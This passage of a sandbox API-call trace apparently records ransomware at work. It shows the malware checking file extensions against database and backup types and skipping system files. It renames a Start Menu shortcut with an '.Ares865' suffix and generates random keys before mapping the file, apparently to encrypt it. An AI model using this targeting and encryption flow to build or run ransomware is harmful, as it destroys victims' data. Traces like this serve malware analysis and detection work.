(lpString1="lnk", lpString2="fpt") returned 1 [0067.316] lstrlenW (lpString="frm") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0067.316] lstrlenW (lpString="gdb") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.316] lstrlenW (lpString="gdb") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0067.316] lstrlenW (lpString="grdb") returned 4 [0067.316] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0067.316] lstrlenW (lpString="gwi") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0067.316] lstrlenW (lpString="hdb") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0067.316] lstrlenW (lpString="his") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0067.316] lstrlenW (lpString="ib") returned 2 [0067.316] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0067.316] lstrlenW (lpString="idb") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0067.316] lstrlenW (lpString="ihx") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0067.316] lstrlenW (lpString="itdb") returned 4 [0067.316] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0067.316] lstrlenW (lpString="itw") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0067.316] lstrlenW (lpString="jet") returned 3 [0067.316] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0067.316] lstrlenW (lpString="jtx") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0067.317] lstrlenW (lpString="kdb") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0067.317] lstrlenW (lpString="kexi") returned 4 [0067.317] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0067.317] lstrlenW (lpString="kexic") returned 5 [0067.317] lstrcmpiW (lpString1="a.lnk", lpString2="kexic") returned -1 [0067.317] lstrlenW (lpString="kexis") returned 5 [0067.317] lstrcmpiW (lpString1="a.lnk", lpString2="kexis") returned -1 [0067.317] lstrlenW (lpString="lgc") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0067.317] lstrlenW (lpString="lwx") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0067.317] lstrlenW (lpString="maf") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0067.317] lstrlenW (lpString="maq") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0067.317] lstrlenW (lpString="mar") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0067.317] lstrlenW (lpString="marshal") returned 7 [0067.317] lstrcmpiW (lpString1="ava.lnk", lpString2="marshal") returned -1 [0067.317] lstrlenW (lpString="mas") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0067.317] lstrlenW (lpString="mav") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0067.317] lstrlenW (lpString="maw") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0067.317] lstrlenW (lpString="mdbhtml") returned 7 [0067.317] lstrcmpiW (lpString1="ava.lnk", lpString2="mdbhtml") returned -1 [0067.317] lstrlenW (lpString="mdn") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0067.317] lstrlenW (lpString="mdt") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0067.317] lstrlenW (lpString="mfd") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0067.317] lstrlenW (lpString="mpd") returned 3 [0067.317] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0067.317] lstrlenW (lpString="mrg") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0067.318] lstrlenW (lpString="mud") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0067.318] lstrlenW (lpString="mwb") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0067.318] lstrlenW (lpString="myd") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0067.318] lstrlenW (lpString="ndf") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0067.318] lstrlenW (lpString="nnt") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0067.318] lstrlenW (lpString="nrmlib") returned 6 [0067.318] lstrcmpiW (lpString1="va.lnk", lpString2="nrmlib") returned 1 [0067.318] lstrlenW (lpString="ns2") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0067.318] lstrlenW (lpString="ns3") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0067.318] lstrlenW (lpString="ns4") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0067.318] lstrlenW (lpString="nsf") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0067.318] lstrlenW (lpString="nv") returned 2 [0067.318] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0067.318] lstrlenW (lpString="nv2") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0067.318] lstrlenW (lpString="nwdb") returned 4 [0067.318] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0067.318] lstrlenW (lpString="nyf") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0067.318] lstrlenW (lpString="odb") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.318] lstrlenW (lpString="odb") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0067.318] lstrlenW (lpString="oqy") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0067.318] lstrlenW (lpString="ora") returned 3 [0067.318] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0067.318] lstrlenW (lpString="orx") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0067.319] lstrlenW (lpString="owc") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0067.319] lstrlenW (lpString="p96") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0067.319] lstrlenW (lpString="p97") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0067.319] lstrlenW (lpString="pan") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0067.319] lstrlenW (lpString="pdb") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0067.319] lstrlenW (lpString="pdm") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0067.319] lstrlenW (lpString="pnz") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0067.319] lstrlenW (lpString="qry") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0067.319] lstrlenW (lpString="qvd") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0067.319] lstrlenW (lpString="rbf") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0067.319] lstrlenW (lpString="rctd") returned 4 [0067.319] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0067.319] lstrlenW (lpString="rod") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0067.319] lstrlenW (lpString="rodx") returned 4 [0067.319] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0067.319] lstrlenW (lpString="rpd") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0067.319] lstrlenW (lpString="rsd") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0067.319] lstrlenW (lpString="sas7bdat") returned 8 [0067.319] lstrcmpiW (lpString1="Java.lnk", lpString2="sas7bdat") returned -1 [0067.319] lstrlenW (lpString="sbf") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0067.319] lstrlenW (lpString="scx") returned 3 [0067.319] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0067.319] lstrlenW (lpString="sdb") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0067.320] lstrlenW (lpString="sdc") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0067.320] lstrlenW (lpString="sdf") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0067.320] lstrlenW (lpString="sis") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0067.320] lstrlenW (lpString="spq") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0067.320] lstrlenW (lpString="te") returned 2 [0067.320] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0067.320] lstrlenW (lpString="teacher") returned 7 [0067.320] lstrcmpiW (lpString1="ava.lnk", lpString2="teacher") returned -1 [0067.320] lstrlenW (lpString="tmd") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0067.320] lstrlenW (lpString="tps") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0067.320] lstrlenW (lpString="trc") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.320] lstrlenW (lpString="trc") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.320] lstrlenW (lpString="trm") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0067.320] lstrlenW (lpString="udb") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0067.320] lstrlenW (lpString="udl") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0067.320] lstrlenW (lpString="usr") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0067.320] lstrlenW (lpString="v12") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0067.320] lstrlenW (lpString="vis") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0067.320] lstrlenW (lpString="vpd") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0067.320] lstrlenW (lpString="vvv") returned 3 [0067.320] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0067.320] lstrlenW (lpString="wdb") returned 3 [0067.321] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0067.321] lstrlenW (lpString="wmdb") returned 4 [0067.321] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0067.321] lstrlenW (lpString="wrk") returned 3 [0067.321] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0067.321] lstrlenW (lpString="xdb") returned 3 [0067.321] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0067.321] lstrlenW (lpString="xld") returned 3 [0067.321] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0067.321] lstrlenW (lpString="xmlff") returned 5 [0067.321] lstrcmpiW (lpString1="a.lnk", lpString2="xmlff") returned -1 [0067.321] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\About Java.lnk.Ares865") returned 66 [0067.321] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\About Java.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\about java.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\About Java.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\about java.lnk.ares865"), dwFlags=0x1) returned 1 [0067.322] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\About Java.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\java\\about java.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0067.322] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1999) returned 1 [0067.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.323] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.323] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.323] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.323] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.323] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.324] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xad0, lpName=0x0) returned 0x12c [0067.327] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xad0) returned 0x190000 [0067.329] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.329] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.329] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.330] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.330] CloseHandle (hObject=0x12c) returned 1 [0067.330] CloseHandle (hObject=0x154) returned 1 [0067.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.330] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762ca4e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x762ca4e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x762ca4e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x7e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Check For Updates.lnk", cAlternateFileName="CHECKF~1.LNK")) returned 1 [0067.330] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.330] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="aoldtz.exe") returned 1 [0067.330] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2=".") returned 1 [0067.330] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="..") returned 1 [0067.330] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="windows") returned -1 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="bootmgr") returned 1 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="temp") returned -1 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="pagefile.sys") returned -1 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="boot") returned 1 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="ids.txt") returned -1 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="ntuser.dat") returned -1 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="perflogs") returned -1 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2="MSBuild") returned -1 [0067.331] lstrlenW (lpString="Check For Updates.lnk") returned 21 [0067.331] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Java\\About Java.lnk") returned 58 [0067.331] lstrcpyW (in: lpString1=0x2cce458, lpString2="Check For Updates.lnk" | out: lpString1="Check For Updates.lnk") returned="Check For Updates.lnk" [0067.331] lstrlenW (lpString="Check For Updates.lnk") returned 21 [0067.331] lstrlenW (lpString="Ares865") returned 7 [0067.331] lstrcmpiW (lpString1="tes.lnk", lpString2="Ares865") returned 1 [0067.331] lstrlenW (lpString=".dll") returned 4 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2=".dll") returned 1 [0067.331] lstrlenW (lpString=".lnk") returned 4 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2=".lnk") returned 1 [0067.331] lstrlenW (lpString=".ini") returned 4 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2=".ini") returned 1 [0067.331] lstrlenW (lpString=".sys") returned 4 [0067.331] lstrcmpiW (lpString1="Check For Updates.lnk", lpString2=".sys") returned 1 [0067.331] lstrlenW (lpString="Check For Updates.lnk") returned 21 [0067.331] lstrlenW (lpString="bak") returned 3 [0067.331] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.331] lstrlenW (lpString="ba_") returned 3 [0067.331] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.331] lstrlenW (lpString="dbb") returned 3 [0067.331] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.331] lstrlenW (lpString="vmdk") returned 4 [0067.331] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.331] lstrlenW (lpString="rar") returned 3 [0067.331] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.331] lstrlenW (lpString="zip") returned 3 [0067.331] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.331] lstrlenW (lpString="tgz") returned 3 [0067.331] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.332] lstrlenW (lpString="vbox") returned 4 [0067.332] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.332] lstrlenW (lpString="vdi") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.332] lstrlenW (lpString="vhd") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.332] lstrlenW (lpString="vhdx") returned 4 [0067.332] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.332] lstrlenW (lpString="avhd") returned 4 [0067.332] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.332] lstrlenW (lpString="db") returned 2 [0067.332] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.332] lstrlenW (lpString="db2") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.332] lstrlenW (lpString="db3") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.332] lstrlenW (lpString="dbf") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.332] lstrlenW (lpString="mdf") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.332] lstrlenW (lpString="mdb") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.332] lstrlenW (lpString="sql") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.332] lstrlenW (lpString="sqlite") returned 6 [0067.332] lstrcmpiW (lpString1="es.lnk", lpString2="sqlite") returned -1 [0067.332] lstrlenW (lpString="sqlite3") returned 7 [0067.332] lstrcmpiW (lpString1="tes.lnk", lpString2="sqlite3") returned 1 [0067.332] lstrlenW (lpString="sqlitedb") returned 8 [0067.332] lstrcmpiW (lpString1="ates.lnk", lpString2="sqlitedb") returned -1 [0067.332] lstrlenW (lpString="xml") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.332] lstrlenW (lpString="$er") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.332] lstrlenW (lpString="4dd") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.332] lstrlenW (lpString="4dl") returned 3 [0067.332] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.333] lstrlenW (lpString="^^^") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.333] lstrlenW (lpString="abs") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.333] lstrlenW (lpString="abx") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.333] lstrlenW (lpString="accdb") returned 5 [0067.333] lstrcmpiW (lpString1="s.lnk", lpString2="accdb") returned 1 [0067.333] lstrlenW (lpString="accdc") returned 5 [0067.333] lstrcmpiW (lpString1="s.lnk", lpString2="accdc") returned 1 [0067.333] lstrlenW (lpString="accde") returned 5 [0067.333] lstrcmpiW (lpString1="s.lnk", lpString2="accde") returned 1 [0067.333] lstrlenW (lpString="accdr") returned 5 [0067.333] lstrcmpiW (lpString1="s.lnk", lpString2="accdr") returned 1 [0067.333] lstrlenW (lpString="accdt") returned 5 [0067.333] lstrcmpiW (lpString1="s.lnk", lpString2="accdt") returned 1 [0067.333] lstrlenW (lpString="accdw") returned 5 [0067.333] lstrcmpiW (lpString1="s.lnk", lpString2="accdw") returned 1 [0067.333] lstrlenW (lpString="accft") returned 5 [0067.333] lstrcmpiW (lpString1="s.lnk", lpString2="accft") returned 1 [0067.333] lstrlenW (lpString="adb") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.333] lstrlenW (lpString="adb") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.333] lstrlenW (lpString="ade") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.333] lstrlenW (lpString="adf") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.333] lstrlenW (lpString="adn") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.333] lstrlenW (lpString="adp") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.333] lstrlenW (lpString="alf") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.333] lstrlenW (lpString="ask") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.333] lstrlenW (lpString="btr") returned 3 [0067.333] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.334] lstrlenW (lpString="cat") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.334] lstrlenW (lpString="cdb") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.334] lstrlenW (lpString="ckp") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.334] lstrlenW (lpString="cma") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.334] lstrlenW (lpString="cpd") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.334] lstrlenW (lpString="dacpac") returned 6 [0067.334] lstrcmpiW (lpString1="es.lnk", lpString2="dacpac") returned 1 [0067.334] lstrlenW (lpString="dad") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.334] lstrlenW (lpString="dadiagrams") returned 10 [0067.334] lstrcmpiW (lpString1="pdates.lnk", lpString2="dadiagrams") returned 1 [0067.334] lstrlenW (lpString="daschema") returned 8 [0067.334] lstrcmpiW (lpString1="ates.lnk", lpString2="daschema") returned -1 [0067.334] lstrlenW (lpString="db-journal") returned 10 [0067.334] lstrcmpiW (lpString1="pdates.lnk", lpString2="db-journal") returned 1 [0067.334] lstrlenW (lpString="db-shm") returned 6 [0067.334] lstrcmpiW (lpString1="es.lnk", lpString2="db-shm") returned 1 [0067.334] lstrlenW (lpString="db-wal") returned 6 [0067.334] lstrcmpiW (lpString1="es.lnk", lpString2="db-wal") returned 1 [0067.334] lstrlenW (lpString="dbc") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.334] lstrlenW (lpString="dbs") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.334] lstrlenW (lpString="dbt") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.334] lstrlenW (lpString="dbv") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.334] lstrlenW (lpString="dbx") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.334] lstrlenW (lpString="dcb") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.334] lstrlenW (lpString="dct") returned 3 [0067.334] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0067.335] lstrlenW (lpString="dcx") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0067.335] lstrlenW (lpString="ddl") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0067.335] lstrlenW (lpString="dlis") returned 4 [0067.335] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0067.335] lstrlenW (lpString="dp1") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0067.335] lstrlenW (lpString="dqy") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0067.335] lstrlenW (lpString="dsk") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0067.335] lstrlenW (lpString="dsn") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0067.335] lstrlenW (lpString="dtsx") returned 4 [0067.335] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0067.335] lstrlenW (lpString="dxl") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0067.335] lstrlenW (lpString="eco") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0067.335] lstrlenW (lpString="ecx") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0067.335] lstrlenW (lpString="edb") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0067.335] lstrlenW (lpString="epim") returned 4 [0067.335] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0067.335] lstrlenW (lpString="fcd") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0067.335] lstrlenW (lpString="fdb") returned 3 [0067.335] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0067.335] lstrlenW (lpString="fic") returned 3 [0067.335] 